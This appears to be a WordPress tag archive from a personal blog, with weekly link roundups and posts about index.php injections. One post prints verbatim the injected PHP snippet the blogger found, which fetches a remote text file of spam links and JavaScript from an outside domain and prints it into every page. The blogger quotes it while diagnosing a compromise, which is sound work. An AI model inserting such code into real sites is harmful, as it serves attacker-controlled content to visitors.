Tag Archives: wordpress

Weekly Linkage: the TSA, Microwaves, and “Dot Dot Dot”

This week’s internet cruising:

Weekly linkage

This week’s internet cruising:

Weekly linkage

This week’s internet cruising:

  • A Beginner’s Guide to Website Feedback – If I can wrap up and launch this damn character sheet app, stuff in this post will be handy for when it betas, especially the surveying. I suspect the LARPing audience will be sufficiently… opinionated to speak on it.
  • Six Useful CSS3 Tools – Some of these are pretty slick, if you're moving into CSS3 development.
  • Sharpening the blade, part MCMXVII: Nine Amazing Hours. – This is incredibly cool, and I plan to use it for a bit and see if it helps me focus.
  • Amazing Examples of Paper Art – I almost hate to link to this, in case Greg gets ideas for elaborate projects.
  • Python Business Rules Engine – Lott raises a good point about handling complex business rules, in that it's (often) cleaner and simpler to go ahead and incorporate complex business rules into the app itself rather than writing a parser to allow external entry. In my case, I have such a small user base on the side that would have been entering these rules that it's just as fine for me to do a small code release for any games added with these validation rules in them.
  • YouTube – Turkish male belly dancer "diva" – Major glitter warning, here. Major. This may be the first male bellydancer I've ever seen who wasn't mocking dancing, and he's very good. I don't like the music or the dissolve and swirling transitions, though. Or the glitter. That's a lot of glitter.
  • Amazon S3 and CloudFront with WordPress and DreamHost | .larre – This is quite a cool plugin. Not the quickest to set up with CloudFront, minifying, and combining, but worth the effort, even just for the hell of it.
  • Girl quits her job on dry erase board, emails entire office – This is apparently fake, but a cute read anyway. I’d advise against airing dirty laundry like that, though.

I’ll be damned – more WP trouble

I was fixing a webcomic issue on Greg’s blog, and I’ll be damned if from one minute to the next, it didn’t suffer from an index.php injection, too. This is weird as hell. A bunch of spurious content appeared on his homepage, although clicking through to those posts showed the correct content.

It may be time to look for alternative blagging software. Unfortunately, there are a lot of nice features that I use in WP.

WordPress PHP injection?

I just found a creepy case of injection in my index.php file. I noticed this morning that my homepage was throwing a “headers already sent” message pointing to index.php, line 10 when it wasn’t cached by Supercache. A reload of the page cleaned it up. But my RSS feed (which currently goes through Feedburner) was also trashed, and /feed wasn’t redirecting. All with the same error. Disabling Supercache fixed the homepage warning, but not the feed.

Being PHP awesome, I checked index.php for trailing whitespace, and found this snippet of code above the standard WordPress code:

< ?php if (extension_loaded("curl")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, "http://bljatdinnnnnnnnnna.net/forum.txt"); $r = curl_exec($ch); curl_close($ch); } else { $r=implode("",file("http://bljatdinnnnnnnnnna.net/forum.txt")); } if($r) print $r; // THIS IS LINE 10! ?>

That’s a problem. That forum file is, as you might expect, a crap ton of links and some JavaScript.

Continue reading WordPress PHP injection?